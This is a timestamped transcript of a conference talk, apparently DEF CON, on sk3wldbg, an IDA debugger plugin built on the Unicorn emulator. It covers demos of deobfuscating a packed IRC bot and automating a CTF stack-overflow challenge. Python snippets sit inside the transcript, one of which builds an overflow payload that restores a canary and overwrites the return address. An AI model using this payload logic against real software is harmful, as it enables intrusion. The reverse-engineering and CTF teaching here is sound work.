00:23:22.801,00:23:26.105 a MIPS binary – you don’t have to go find a MIPS platform 00:23:26.105,00:23:30.442 anywhere, right you can just pop out into the debugger and 00:23:30.442,00:23:33.846 emulate through your MIPS code and if you want to, you can 00:23:33.846,00:23:36.115 utilise IDA’s features for pulling some of that information 00:23:36.115,00:23:41.120 back. Same is true for SPARC, or ARM – what’d I say? 68K? x86, 64-bit 00:23:44.223,00:23:50.262 x86 on the 32-bit platform, or vice versa. Uh, so uh, I got 00:23:50.262,00:23:53.232 exactly what I wanted 12 years ago with a lot more flexibility. 00:23:53.232,00:23:59.138 Okay [Clears throat]. 
As it’s doing this, you can go anywhere from basic 00:23:59.138,00:24:03.442 “I got 5 lines of code I want to emulate” okay, to “trying to 00:24:03.442,00:24:07.346 emulate through an actual process” right, if the code is 00:24:07.346,00:24:10.282 formatted in the form of an executable … like an ELF or a 00:24:10.282,00:24:16.722 PE, okay. The debugger plugin tries to load that up and map 00:24:16.722,00:24:22.695 that into an address space that is roughly what you get if you 00:24:22.695,00:24:25.097 were to run it on the actual architecture the binary was 00:24:25.097,00:24:28.167 intended for. Okay, there’s a lot of challenge with doing 00:24:28.167,00:24:31.437 that, okay. We don’t get to op- we don’t get to emulate through 00:24:31.437,00:24:33.972 the kernel, right we don’t have a system call interface, 00:24:33.972,00:24:37.710 although we’ll talk about later, one of my goals is to add a 00:24:37.710,00:24:40.779 capability of hooking system calls, so you can stub out some 00:24:40.779,00:24:44.149 of the more common ones perhaps, and provide some fake results 00:24:44.149,00:24:49.755 back up into your emulation. So, the uh, the debugger includes 00:24:49.755,00:24:55.728 a very basic loader for PEs and ELFs, right they load those two 00:24:55.728,00:25:00.599 file formats into Unicorn’s uh, state into, into the Unicorn 00:25:00.599,00:25:03.535 emulation before you start up your emulation, give you 00:25:03.535,00:25:09.208 stacks, and so on. Okay, if you don’t have a format that Unicorn 00:25:09.208,00:25:13.245 recognises, okay or that sk3wldbg recognises, then all it 00:25:13.245,00:25:16.849 does is take the entire content of your IDA database and 00:25:16.849,00:25:21.420 copy it out into mapped sections, right, in the Unicorn emulator. 00:25:21.420,00:25:24.123 So, however it’s mapped in IDA, right, that’s what you get out 00:25:24.123,00:25:28.026 in Unicorn. 
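Copying database segments into mapped emulator memory involves one practical wrinkle: Unicorn's `uc_mem_map` requires both the address and the size of a mapping to be 4 KB aligned, while segments in a database can start and end anywhere. The sketch below shows one way to turn arbitrary segment ranges into page-aligned regions, merging any that touch or overlap after rounding. The function name, the tuple layout and the merging policy are assumptions for illustration; the talk does not say how the plugin handles this.

```python
from typing import Iterable, List, Tuple

PAGE_SIZE = 0x1000  # Unicorn maps memory in 4 KB-aligned units


def page_aligned_regions(
    segments: Iterable[Tuple[int, int]],
) -> List[Tuple[int, int]]:
    """Turn half-open (start, end) segment ranges into (base, size) regions.

    Each region is rounded out to page boundaries, and regions that touch
    or overlap after rounding are merged so no page is mapped twice.
    """
    regions: List[List[int]] = []
    for start, end in sorted(segments):
        base = start & ~(PAGE_SIZE - 1)                    # round down
        limit = (end + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)   # round up
        if regions and base <= regions[-1][1]:
            regions[-1][1] = max(regions[-1][1], limit)    # extend previous
        else:
            regions.append([base, limit])
    return [(base, limit - base) for base, limit in regions]


# Hypothetical segment layout: two ranges sharing a page, one far away.
segments = [(0x401000, 0x401234), (0x401800, 0x402010), (0x600000, 0x600100)]
regions = page_aligned_regions(segments)
```

Each resulting `(base, size)` pair could then be mapped once and the segment bytes written at their original addresses inside it, so the layout the emulator sees matches the layout in the database.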
It usually throws in a stack okay, because that’s 00:25:28.026,00:25:30.329 something you’re going to need, that you don’t ever see in IDA, 00:25:30.329,00:25:35.267 okay, but stacks are pretty useful and uh, an awful lot of 00:25:35.267,00:25:40.472 instructions make use of them. Some of the issues, with uh, 00:25:40.472,00:25:44.209 doing all this- If anybody’s used Unicorn, right, you might 00:25:44.209,00:25:49.281 have some familiarity with building that. Uh, IDA is a 32 00:25:49.281,00:25:53.285 bit executable, okay. Even though you may see ‘well there’s 00:25:53.285,00:25:56.522 this 64 bit uh, version of IDA out there’, all that means is 00:25:56.522,00:26:01.293 that it can understand uh, 64 bit binaries. Okay, it is still a 32 00:26:01.293,00:26:05.431 bit native executable when you go to run it. That means that if 00:26:05.431,00:26:08.867 you want to integrate with it, you’ve got to build 32bit 00:26:08.867,00:26:12.638 libraries. Okay, so when you build Unicorn, you’ve got to 00:26:12.638,00:26:16.642 build it as a 32 bit library of Unicorn, for the platform 00:26:16.642,00:26:19.511 you’re running IDA on, okay, whether that’s Windows, Linux or 00:26:19.511,00:26:23.749 Mac. Unicorn unfortunately doesn’t have very good support for 00:26:23.749,00:26:27.686 building 32bit libraries, they sort of assume that everybody’s 00:26:27.686,00:26:30.823 doing 64bit stuff these days. Why would you want to build 00:26:30.823,00:26:35.227 a 32bit binary anymore? So we had to fix that up a little bit, and 00:26:35.227,00:26:37.896 they’re getting better at uh, being able to build 32bit 00:26:37.896,00:26:43.302 binaries. Uh, doesn’t also have- also doesn’t have very good 00:26:43.302,00:26:45.637 support available for building on Windows, that’s primarily 00:26:45.637,00:26:50.642 related to QEMU’s dependence on glib. 
Which is not found on 00:26:52.845,00:26:55.547 Windows platforms, right, unless you reach out and find something 00:26:55.547,00:27:00.652 like Cygwin, right, or MinGW, right, and install the requisite 00:27:00.652,00:27:05.123 libraries out of those uh particular utilities. So, this 00:27:05.123,00:27:08.827 complicates uh, Windows builds – in fact they don’t have Windows 00:27:08.827,00:27:12.831 builds in their continuous integration uh, when you uh, go 00:27:12.831,00:27:16.301 observe how the project is uh – the state of the project out 00:27:16.301,00:27:19.571 there on the GitHub site. So it makes building on Windows a 00:27:19.571,00:27:24.843 little bit tough, but it can be overcome and in the end you’re 00:27:24.843,00:27:28.680 able to integrate uh, Unicorn into IDA on all the platforms 00:27:28.680,00:27:34.353 for which IDA is available. All right. [Clears throat] It’s 00:27:34.353,00:27:36.255 about all I’m going to talk about on a high level – it’s 00:27:36.255,00:27:39.124 pretty straightforward: Here’s a – here’s a disassembler; 00:27:39.124,00:27:44.263 here’s an emulator; and uh it either works or it doesn’t. So 00:27:44.263,00:27:47.599 we’ll see. I’m going to go through some demos, and show you 00:27:47.599,00:27:51.370 what it looks like. Uh, I’m going to start off with uh, some 00:27:51.370,00:27:54.006 simple de-obfuscation stuff. I’m going to show it to you in a 00:27:54.006,00:27:55.874 couple of different ways. I’m going to go through it fairly 00:27:55.874,00:27:58.944 quickly, okay I’m not going to try – I’m going to try not to 00:27:58.944,00:28:02.281 get bogged down in the details of IDAisms or how to use IDA, or 00:28:02.281,00:28:04.149 things like that. I’m just going to show you what each of these 00:28:04.149,00:28:08.220 things do, what they look like uh, and uh, let you form your 00:28:08.220,00:28:12.758 own opinions as to the utility of each, and perhaps whether you 00:28:12.758,00:28:16.528 prefer one approach to another. 
So, if this all works out I’m 00:28:16.528,00:28:19.498 going to use this old-style emulator. Let’s see. I have to 00:28:19.498,00:28:25.370 pick the right version of IDA. Okay, we’ll do this one. Right, 00:28:25.370,00:28:28.640 so you might recognise this section name, this is just a UPX 00:28:28.640,00:28:33.145 packed binary. Okay, if all goes well here okay I’m going to 00:28:33.145,00:28:39.551 bring up this old emulator – please work. Okay, it’s coming, 00:28:39.551,00:28:44.556 my machine is slow. This is an example of uh, the original x86 00:28:48.293,00:28:52.598 emulator that I did in IDA [Chuckles] Good jokes, front 00:28:52.598,00:28:58.270 row? Okay, and what you’re going to see here, assuming this 00:28:58.270,00:29:03.208 works, is a, a crude debugger-like uh, console, that’s 00:29:03.208,00:29:06.144 going to come up. We’re not going to leave IDA’s static user 00:29:06.144,00:29:09.681 interface. I’m not happy with this. Uh, and we’re going to be 00:29:09.681,00:29:15.687 able to emulate through IDA with uh, without leaving its common 00:29:15.687,00:29:20.692 interface here, unless it never comes up. Awesome. Okay, while 00:29:23.061,00:29:29.701 that’s going on we may as well start the other one. Okay. 00:29:29.701,00:29:34.906 Behind this door, we’re going to try to do this with Bochs, okay, IDA’s 00:29:34.906,00:29:39.478 Bochs plugin. So, in order to do that, we’ve got to switch our 00:29:39.478,00:29:43.348 debugger over and you see IDA offers a number of debuggers. 00:29:43.348,00:29:46.785 It’s context aware; what platform you’re running IDA on 00:29:46.785,00:29:50.055 and the nature of the binary uh, that you’re loading up. So you 00:29:50.055,00:29:53.458 can see one of these is a local Bochs debugger, right. And 00:29:53.458,00:29:56.728 assuming I haven’t messed this up either, and still have Bochs 00:29:56.728,00:30:02.100 installed properly, right, if I choose Bochs as a debugger. 
Oh, 00:30:02.100,00:30:05.904 that doesn’t do anything; we’ve got to actually run it right? 00:30:05.904,00:30:08.740 So, I’ll set a breakpoint at the beginning of the code here, I’ll 00:30:08.740,00:30:12.978 set a breakpoint down towards the end over here. Okay, we’re 00:30:12.978,00:30:15.414 not going to jump out and execute any of these function 00:30:15.414,00:30:19.317 calls, because they jump out into Windows libraries. We’ll just 00:30:19.317,00:30:21.987 set a breakpoint down here at the end, maybe bring up a 00:30:21.987,00:30:25.791 strings view - try to convince you that it’s actually doing 00:30:25.791,00:30:30.128 work. Right, all these strings, I don’t know if that shows up at 00:30:30.128,00:30:33.065 all, uh, but these are the obfuscated strings that are part 00:30:33.065,00:30:36.134 of the binary. You can see bits and pieces of strings, but it’s 00:30:36.134,00:30:41.139 not fully de-obfuscated. And if Bochs lets me do this… ah… then, 00:30:50.348,00:30:55.353 we can start debugging, and this is going to toggle into… maybe… 00:31:01.460,00:31:05.330 a segue back to the other demo. There’s Bochs- there’s Bochs 00:31:05.330,00:31:08.433 starting up. I’ve got too much going on, on this machine. And 00:31:08.433,00:31:14.172 so, IDA started up Bochs. It’s got this IPC channel between the 00:31:14.172,00:31:17.776 two, okay. So now IDA gives us a debugger view – we’re not really 00:31:17.776,00:31:21.713 running the process. Okay, all the – all the emulation data has 00:31:21.713,00:31:24.683 been stuffed into Bochs, and Bochs is going to do its thing. But 00:31:24.683,00:31:27.085 this is just a standard IDA debugger view, if you’re running 00:31:27.085,00:31:29.888 a process and actually attached to it, this is what you’d see. 00:31:29.888,00:31:32.991 It’s not the best user interface in the world, it's probably the- 00:31:32.991,00:31:36.194 the number one knock against using IDA as a debugger, right, 00:31:36.194,00:31:39.131 is its user interface. 
It’s not great, but we can step through 00:31:39.131,00:31:44.102 it. Right, and the register state updates up here and so on. 00:31:44.102,00:31:47.773 Right, and we can let it run, and we should hit our second 00:31:47.773,00:31:50.342 breakpoint at some point down there, and we can go back and 00:31:50.342,00:31:55.046 look at the strings in the binary. And, maybe if I did this 00:31:55.046,00:31:59.985 right… right, you’re just going to have to trust me. I need one 00:32:09.694,00:32:14.699 of those things. [Audience laughs] >> [Inaudible response] 00:32:21.306,00:32:22.674 >> [Speaker laughs] Yeah. Wow, I’ve just got to pull these 00:32:22.674,00:32:28.480 strings out of Bochs’s memory. All right, let’s see how our other 00:32:28.480,00:32:30.882 thing is doing. Look at that. It’s like a cooking show; you’ve 00:32:30.882,00:32:34.352 got a couple of things in the oven at one time, right. So this 00:32:34.352,00:32:37.889 is ... the emulated view, right. ida-x86emu, totally different 00:32:37.889,00:32:43.328 view – we never leave uh, the uh, normal IDA interface, and 00:32:43.328,00:32:46.097 you’ve got this tiny little panel that pops up, right. It’s 00:32:46.097,00:32:49.568 very specific to x86, so taking this approach with other 00:32:49.568,00:32:52.804 architectures you’d have to come up with your own interface, 00:32:52.804,00:32:55.607 right, and replace all the x86 registers with whatever 00:32:55.607,00:32:59.778 registers you have for that particular architecture. It lets 00:32:59.778,00:33:03.014 you do some things like manipulate memory. Memory is 00:33:03.014,00:33:05.584 really just the database; everything you’re manipulating 00:33:05.584,00:33:08.854 is just a change to the database. 
Right and you’re just 00:33:08.854,00:33:11.990 – that’s your memory story; you fetch bytes out of the database, 00:33:11.990,00:33:14.559 you emulate them, you modify the database if that’s what it says 00:33:14.559,00:33:18.630 to do. Uh, but again, it’s destructive, right. So, we can 00:33:18.630,00:33:21.967 sit here, and I can click on you know step, step and it’s hard to 00:33:21.967,00:33:25.570 see but, if you watch the blue here… it doesn’t really 00:33:25.570,00:33:29.808 highlight… that blue is stepping through various instructions and 00:33:29.808,00:33:32.677 will jump down and follow through and so on. And I can 00:33:32.677,00:33:38.083 reach down into the same binary… okay which is down here before 00:33:38.083,00:33:44.923 these function calls, set a breakpoint and say ‘run’. And 00:33:44.923,00:33:50.128 this is much slower than Bochs, because actually it’s… all the 00:33:50.128,00:33:52.697 interactions with the IDA database are pretty slow, but we 00:33:52.697,00:33:55.967 hit our breakpoint and we can go back to our strings window, and 00:33:55.967,00:34:00.906 set this thing back up again. Oh, and we should have lots of 00:34:06.011,00:34:11.016 interesting strings, right. Like this. And this is just an old 00:34:13.718,00:34:16.254 IRC bot, but we got all these strings out of it because it’s 00:34:16.254,00:34:20.325 mostly de-obfuscated. And then you say you’re done. Right, we 00:34:20.325,00:34:24.863 close this up and you go back here and in fact what was 00:34:24.863,00:34:29.134 formerly empty space is now code that we can go and 00:34:29.134,00:34:32.637 disassemble. We didn’t hop into our debugger, we’ve destroyed 00:34:32.637,00:34:35.840 our database, right, it doesn’t look like it used to look, okay, 00:34:35.840,00:34:38.410 but we’ve got de-obfuscated code, and we just continue from 00:34:38.410,00:34:41.746 this point doing static analysis. 
Okay, so it’s a quick 00:34:41.746,00:34:44.983 in and out and I considered that approach, but for the user 00:34:44.983,00:34:48.920 interface aspect of it, okay, I might have gone that way. Now 00:34:48.920,00:34:54.426 let's see if Bochs is behaving for us. Over on the Bochs side, we’ve 00:34:54.426,00:34:59.431 got- hopefully got the same strings… somewhere. Yeah, look 00:35:02.701,00:35:07.706 at all this library code. I have no idea why that’s even coming. 00:35:28.893,00:35:33.131 No, oh yeah here we go. Right, and so here it is again, it’s 00:35:33.131,00:35:35.867 an IRC bot and you can see registry keys in there that it’s 00:35:35.867,00:35:39.304 going to reference, and so on. So we get the same result, but 00:35:39.304,00:35:44.042 we have a modified IDA database [Inaudible]. Okay, so it’s like 00:35:44.042,00:35:47.979 a running process, okay and I would have to then extract this 00:35:47.979,00:35:53.652 from Bochs back into IDA, right, if I wanted to make this data 00:35:53.652,00:35:59.424 permanent. So, this is again the approach that I took, and now 00:35:59.424,00:36:02.027 we’ll go do this a different way. And this is where you 00:36:02.027,00:36:06.031 thought those demos were bad. Let’s see how we do here. Set a 00:36:06.031,00:36:10.101 breakpoint up here, try to set a breakpoint same place down here. 00:36:10.101,00:36:15.106 Okay. And this time I’m going to switch my debugger over, and if 00:36:19.177,00:36:23.782 it’s installed appropriately, it’ll show up as sk3wldbg. 00:36:23.782,00:36:30.355 So we do this… okay. We go back up here to the beginning and we 00:36:30.355,00:36:35.093 try to kick this off. Hopefully I hit my first breakpoint. Okay, 00:36:35.093,00:36:38.997 and then the plugin looks a lot like Bochs, right. So, but this is 00:36:38.997,00:36:43.401 Unicorn handling this particular emulation. 
Okay, so you get 00:36:43.401,00:36:48.173 register state over here, right, just like you do in Bochs, and any 00:36:48.173,00:36:51.743 other debugger and so on. And at this point we can just step 00:36:51.743,00:36:57.449 through, and it tracks along and I can let it run. And we’ll do 00:36:57.449,00:37:02.387 the whole strings trick… see if we get anything interesting. 00:37:05.590,00:37:09.561 Okay, right now there’s not much but the names of a couple of 00:37:09.561,00:37:13.665 libraries that get imported. Then we go back over here and we 00:37:13.665,00:37:19.471 let it run, just hit ‘go’ here. Hit our breakpoint. Come back, 00:37:19.471,00:37:24.476 rerun strings... okay, and like the other two emulators, now 00:37:28.780,00:37:33.151 we’ve got all of these, right, strings extracted from memory 00:37:33.151,00:37:38.590 and if we go down to the bottom of the uh, self decoding loop we 00:37:38.590,00:37:42.727 can jump up, and very much like Bochs, right, this is the extracted 00:37:42.727,00:37:44.796 code which we can then turn into code right up here in our 00:37:44.796,00:37:48.166 emulator, or in the debugging session. But, again I don’t have 00:37:48.166,00:37:53.138 that back in my database, and when I go to quit this, I’m 00:37:53.138,00:37:56.474 right back where I started from, okay. And I don’t have any 00:37:56.474,00:38:01.913 strings, and if I follow the jump, right, up here you can see 00:38:01.913,00:38:06.151 it’s empty. Right, because this is the region in the binary that 00:38:06.151,00:38:09.854 it unpacks itself into. Right, so it’s it’s very much like a 00:38:09.854,00:38:13.091 debugger and not a static over-write or whatever you might 00:38:13.091,00:38:18.463 like to call it, okay. So that’s it emulating 32 bit x86 code 00:38:18.463,00:38:22.767 on 64 bit Windows. Let’s see what else I think I’m going to 00:38:22.767,00:38:26.938 do, okay. 
Local arm emulation, so Windows platform; no network 00:38:26.938,00:38:31.376 connections, no arm hardware, okay. Somewhere I’ve got an arm 00:38:31.376,00:38:37.148 binary open, okay. Let’s see where this one comes from. Let 00:38:37.148,00:38:43.321 me find the right binary… there we go. Okay, it’s an arm binary 00:38:43.321,00:38:46.457 from an old DefCon ‘capture the flag’, shout out to legit BS, 00:38:46.457,00:38:51.462 right, okay, uh, one of their first CTF’s. But uh, arm- arm 00:38:54.699,00:38:59.504 binary on Windows, okay, and… actually it’s not going to offer 00:38:59.504,00:39:02.640 me any debugger, because IDA has no clue what to do with this, 00:39:02.640,00:39:06.244 right. ELF binary, Arm, Windows, right – don’t do ELF, don’t do 00:39:06.244,00:39:10.648 ARM, okay, but the debugger recognises the architecture at 00:39:10.648,00:39:13.651 least, so it says ‘I’m available” And it’s the only 00:39:13.651,00:39:16.187 debugger that says it's available, so IDA has already 00:39:16.187,00:39:22.126 selected it up there. And we can kick this off. And, now we’re 00:39:22.126,00:39:25.663 debugging arm, more or less emulation. Don’t worry about 00:39:25.663,00:39:32.537 that [Chuckles] Awesome, um, see where it goes on. So there’s 00:39:32.537,00:39:36.274 some memory mapping problems there, let’s see if… yeah, not 00:39:36.274,00:39:42.547 going to work. Clapping for my crash, it’s all … look at that… 00:39:42.547,00:39:44.549 We’ll just pass all these exceptions on, it looks like 00:39:44.549,00:39:47.218 it's just advancing, maybe it’s even updating registers. Okay. 00:39:47.218,00:39:52.924 Uh, r2 is actually equal to one at this point. [Mumbling] look 00:39:52.924,00:39:57.729 at that, yeah, okay. Uh, I left this open and it had some stale 00:39:57.729,00:40:01.399 state and I think it's not happy with me, okay. 
But that’s the 00:40:01.399,00:40:05.203 idea right – we’re in a debugging session uh, and we can 00:40:05.203,00:40:08.539 jump in and out of this without having to fire up an ARM 00:40:08.539,00:40:12.610 environment, okay, do any remote communications… to a remote ARM 00:40:12.610,00:40:16.047 device, and then when we’re done we step out and we’re back 00:40:16.047,00:40:22.787 in our IDA disassembly session, okay. What else? Oh! Now, MIPS, 00:40:22.787,00:40:27.792 let’s see. MIPS I don’t even have any idea how to read, okay. So, 00:40:33.131,00:40:35.366 somebody out there probably says that’s MIPS, so I don’t know, 00:40:35.366,00:40:41.773 right. IDA thinks it’s MIPS. Again, no MIPS debugger in IDA, 00:40:41.773,00:40:44.809 I can’t switch my debuggers, right, there’s no other debugger 00:40:44.809,00:40:50.581 option so you can see that… No, don’t do that… Right, 00:40:50.581,00:40:56.321 sk3wldbg is, is selected, okay. So we try to hit ‘GO’ here, and, 00:40:56.321,00:41:01.893 hopefully we hit our breakpoint from which maybe we can step, 00:41:01.893,00:41:03.995 although I don’t have a stack, so this is probably a bad 00:41:03.995,00:41:08.299 choice, let’s see. Step. Step. Step. Step. Right, and we’re 00:41:08.299,00:41:13.271 emulating our way through MIPS code. Okay. Yes, 5 minutes, 00:41:13.271,00:41:18.643 great, because I am tired. Okay, so we hop out of that and we’re 00:41:18.643,00:41:21.412 again back to our disassembly view. Okay, and I’m not going to 00:41:21.412,00:41:24.115 go into the ways you integrate, you know, what you have 00:41:24.115,00:41:26.284 available in your disassembly view and what you have available 00:41:26.284,00:41:28.686 in your static view. But, suffice to say, there’s ways to 00:41:28.686,00:41:32.757 pull information back across, if you decide that it’s useful for 00:41:32.757,00:41:36.527 augmenting what you have on the static side. 
Last thing I’m 00:41:36.527,00:41:42.967 going to do is take a look at uh, one of the challenges from 00:41:42.967,00:41:49.240 DefCon qualifier this year. Okay, and what this was, was a 00:41:49.240,00:41:54.445 binary that [Clears Throat] they gave you a thousand of them. 00:41:54.445,00:41:59.984 Okay, and when you went to interact with the competition, 00:41:59.984,00:42:04.322 right, they as- you had one minute, right, to craft an 00:42:04.322,00:42:08.292 exploit for one of these thousand binaries that they gave 00:42:08.292,00:42:11.429 you the file name for. So, you downloaded a thousand binaries, 00:42:11.429,00:42:13.831 and you had a minute to craft the exploit. So, it’s going to 00:42:13.831,00:42:17.602 take a long time to do all those by hand, okay, so you want to 00:42:17.602,00:42:19.804 automate this and you want to have an answer in your hip 00:42:19.804,00:42:23.141 pocket when they say “Give me your exploit for binary number 00:42:23.141,00:42:28.279 one.” Okay, so how do you automate? Well it turns out that 00:42:28.279,00:42:32.116 all of these binaries have roughly the same pattern, and 00:42:32.116,00:42:34.886 I’ll describe it, not by looking at the code, but by looking at 00:42:34.886,00:42:39.290 the stack and there’s two buffers in here, okay. And all 00:42:39.290,00:42:43.394 of the binaries differ in the location of that user input 00:42:43.394,00:42:47.632 buffer in the stack relative to the same return address; the 00:42:47.632,00:42:51.736 size of that user input buffer in the stack; and then the 00:42:51.736,00:42:55.406 contents that gets placed into what I call a canary string, 00:42:55.406,00:42:59.510 right there. 
So they gave you a free overwrite out of that user 00:42:59.510,00:43:02.547 input buffer, but you have to figure out ‘how much do I have 00:43:02.547,00:43:07.618 to overwrite to clobber EIP’ okay, and after you’ve done 00:43:07.618,00:43:10.755 that, which is not a problem, there’s nothing hindering the 00:43:10.755,00:43:14.926 overwrite, but they come back and verify that the canary 00:43:14.926,00:43:17.595 string matches the original canary that they’ve placed in 00:43:17.595,00:43:20.031 there. So as you do your overwrite, you’ve got to rewrite 00:43:20.031,00:43:22.200 the canary in there and it better match the original 00:43:22.200,00:43:26.204 string. But all thousand binaries have a different canary 00:43:26.204,00:43:29.240 and it’s not always obvious exactly the way they set it, 00:43:29.240,00:43:32.376 right, they copy it, they copy it one byte at a time, they do a 00:43:32.376,00:43:35.313 string copy, they do it a lot of different ways, okay. But they 00:43:35.313,00:43:39.550 always end up doing a string compare at the end. So, if you 00:43:39.550,00:43:44.088 can put a breakpoint at the string compare, right, and hit 00:43:44.088,00:43:46.324 it, it doesn’t matter what you fill the buffer with, you can do 00:43:46.324,00:43:48.526 some other computations to figure out the distance from the 00:43:48.526,00:43:51.662 start of your buffer to, say, EIP, set a breakpoint on the string 00:43:51.662,00:43:55.433 compare, look at the required arguments sitting on the stack, 00:43:55.433,00:43:58.936 and pick that out and these become your parameters. What’s 00:43:58.936,00:44:02.974 my canary got to be; right, how long is it from EIP all the way 00:44:02.974,00:44:05.543 down to the uh, buffer? And there’s a couple other 00:44:05.543,00:44:07.645 constants you needed to pick out, but I didn’t want to do 00:44:07.645,00:44:10.581 this a thousand times by hand – nobody did. 
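To make the overwrite concrete, here is a minimal sketch of how a payload could be assembled once those parameters are known. It assumes the canary sits between the user input buffer and the saved return address, and that the target is 32-bit little-endian x86; the offsets, the canary value, and the function name are made up for illustration and do not come from the actual challenge binaries.

```python
import struct

def build_payload(canary_offset, canary, ret_offset, ret_addr, filler=b"A"):
    """Build an overflow that restores the canary and then clobbers saved EIP.

    canary_offset: bytes from the start of the user buffer to the canary
    ret_offset:    bytes from the start of the user buffer to saved EIP
    """
    if canary_offset + len(canary) > ret_offset:
        raise ValueError("canary would overlap the return address")
    payload = filler * canary_offset                 # pad up to the canary
    payload += canary                                # rewrite the expected string
    payload += filler * (ret_offset - len(payload))  # pad up to saved EIP
    payload += struct.pack("<I", ret_addr)           # 32-bit little-endian address
    return payload

# Hypothetical parameters for one binary
payload = build_payload(canary_offset=32, canary=b"s3cr3t\x00",
                        ret_offset=60, ret_addr=0x41424344)
```

The example canary carries its terminating NUL so that a string compare would stop at the right place. Whether a NUL byte can actually be delivered depends on how a given binary reads its input, which this sketch does not model.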
And there’s some 00:44:10.581,00:44:14.752 good write-ups about using some other automated systems to solve 00:44:14.752,00:44:18.689 this, but what I did was I scripted up this emulator, and 00:44:18.689,00:44:22.860 the emulator… lets see… somewhere the script exists, 00:44:22.860,00:44:26.597 down here these things because this is implemented as an IDA 00:44:26.597,00:44:31.002 emulator, right, you get all of IDA’s debugger scripting – I’m 00:44:31.002,00:44:33.838 sorry – IDA debugger, all of IDA’s debugger scripting can be 00:44:33.838,00:44:37.108 used to drive this thing, right. So we write the script, we load 00:44:37.108,00:44:40.011 the debugger, we set some debugger option to break on 00:44:40.011,00:44:43.447 start, we run through the start address, right, we do some 00:44:43.447,00:44:48.252 things, okay, we get the value of EIP, and I’m picking out all 00:44:48.252,00:44:51.856 of the arguments, all of the bits-and-pieces from a dynamic 00:44:51.856,00:44:54.258 environment, although I’m not actually running a process, I’m 00:44:54.258,00:44:58.162 just emulating through it. And by the time I get done to down 00:44:58.162,00:45:01.232 by the bottom, I’ve picked out a bunch of parameters that I’m 00:45:01.232,00:45:04.969 going to need. And, what I did was I just took those parameters 00:45:04.969,00:45:08.906 and wrote them out as a python dictionary entry, and so I had a 00:45:08.906,00:45:12.043 dictionary of parameters – when they told me what binary to 00:45:12.043,00:45:17.114 exploit, I said “Ah, I made my key into my dictionary is the 00:45:17.114,00:45:19.951 name of the binary I pick out the parameters, right, and I 00:45:19.951,00:45:23.354 craft my buffer and fire it out”. Okay, and what that looks 00:45:23.354,00:45:29.293 like is this. Okay, we run IDA in batch mode, okay and then 00:45:29.293,00:45:34.532 I’ll be done, I promise. You’ve got this one, and then we’ve got 00:45:34.532,00:45:39.537 which one…? This one. 
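The bookkeeping side of this can be sketched in a few lines: each emulation run emits one line of Python dictionary source, and the exploit client later rebuilds the dictionary and looks up parameters by binary name. The file names, keys, and helper names below are hypothetical; the talk does not show the actual output format.

```python
import ast

def format_entry(binary_name, params):
    """Render one result as a line of Python dictionary source."""
    return "    %r: %r," % (binary_name, params)

def load_entries(lines):
    """Rebuild the dictionary from lines produced by format_entry.

    ast.literal_eval only accepts literals, so nothing in the file is executed.
    """
    return ast.literal_eval("{\n" + "\n".join(lines) + "\n}")

# Hypothetical results from two emulation runs
lines = [
    format_entry("binary_0001", {"canary": b"s3cr3t", "canary_offset": 32, "ret_offset": 60}),
    format_entry("binary_0002", {"canary": b"hunter2", "canary_offset": 48, "ret_offset": 80}),
]
table = load_entries(lines)
params = table["binary_0002"]  # the name the remote side asks for is the key
```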
Okay, so I’ve got two windows right here, 00:45:48.346,00:45:52.316 I’m tailing an output file on the bottom, okay, I’m going to use 00:45:52.316,00:45:55.853 IDA in batch mode – you can see the long command line there. 00:45:55.853,00:45:58.656 And, what I’m going to do is I’m going to run that script that I 00:45:58.656,00:46:01.225 wrote, and I’m going to run it against one of these thousand 00:46:01.225,00:46:03.594 binaries – well in this directory there’s 300 of them, 00:46:03.594,00:46:06.297 and they all scroll up like that. We’ll see if this will 00:46:06.297,00:46:10.401 work. [Inaudible] Make sure I clean out some stale files – 00:46:10.401,00:46:15.406 wait a minute I’ve got it. Kill that IDA session because… It’s 00:46:18.409,00:46:23.414 going to get in the way of… the batch run, and we'll try this 00:46:27.852,00:46:31.355 out. You’ll see IDA files you have to look in the background, 00:46:31.355,00:46:35.693 if everything works. So, IDA’s coming in batch mode, we’re in 00:46:35.693,00:46:38.462 debugger mode, it’s done you can see the output down at the 00:46:38.462,00:46:42.600 bottom. Right, that quickly… It got into an emulation on that 00:46:42.600,00:46:47.304 ELF binary, okay, ran through main, picked out the parameters 00:46:47.304,00:46:49.940 it needed and dumped them out to me – now I wrap that in a little 00:46:49.940,00:46:51.942 loop, do it for every file in the current directory, and I’ve 00:46:51.942,00:46:54.779 got my thousand exploit parameters, and I’m ready to 00:46:54.779,00:46:59.784 connect to the remote site. [Audience applause] Okay, so for 00:47:06.624,00:47:09.660 the future and very quickly: Better user interface on 00:47:09.660,00:47:11.862 launching the emulator, it would be nice to be able to specify 00:47:11.862,00:47:14.832 some register state – right now I just take a guess. Right, 00:47:14.832,00:47:17.201 where do you want to start your emulation? 
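The "little loop" could look something like the sketch below, which only builds one IDA command line per binary in a directory. The `-A` (autonomous), `-c` (start from a fresh database), and `-S` (run a script) switches are standard IDA options, but the executable name, the script name, and the file filter are assumptions; the command line actually used in the demo is not shown in the transcript.

```python
import os

def batch_commands(directory, ida_exe="idaq", script="extract_params.py"):
    """Return one IDA batch command line per candidate binary in `directory`.

    ida_exe and script are placeholders; substitute whatever your install uses.
    """
    skip = (".idb", ".i64", ".py", ".log")  # leftovers from earlier runs
    cmds = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path) or name.endswith(skip):
            continue
        cmds.append([ida_exe, "-A", "-c", "-S" + script, path])
    return cmds
```

Each command list can be handed to `subprocess.run(cmd, check=True)` in turn. Running them sequentially avoids two IDA instances competing for the same database files.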
Do you want your- any 00:47:17.201,00:47:19.570 register to have particular value? So, I’d like to have that 00:47:19.570,00:47:24.442 done up. Uh, some options for mapping into particular memory 00:47:24.442,00:47:28.045 regions; loading other regions. Uh, if you’re familiar with IDA 00:47:28.045,00:47:30.414 and debuggers there’s a very useful interface called 00:47:30.414,00:47:34.251 ‘AppCall’ that just- that actually lets you incorporate 00:47:34.251,00:47:38.556 uh, functions or call them almost natively from IDA python, 00:47:38.556,00:47:40.891 right call out and have your function run and then spit the 00:47:40.891,00:47:43.928 value back to you in your scripts. Uh, I’d like to have a 00:47:43.928,00:47:47.364 hooking library, to be able to hook various functions and to 00:47:47.364,00:47:50.067 things maybe other than what the emulator is doing, or provide 00:47:50.067,00:47:54.371 shims for library calls or system calls, things like that. 00:47:54.371,00:47:57.975 And, uh also perhaps add the option to go ahead and pull in 00:47:57.975,00:48:01.045 all of the shared libraries uh, that a dynamic [Inaudible] 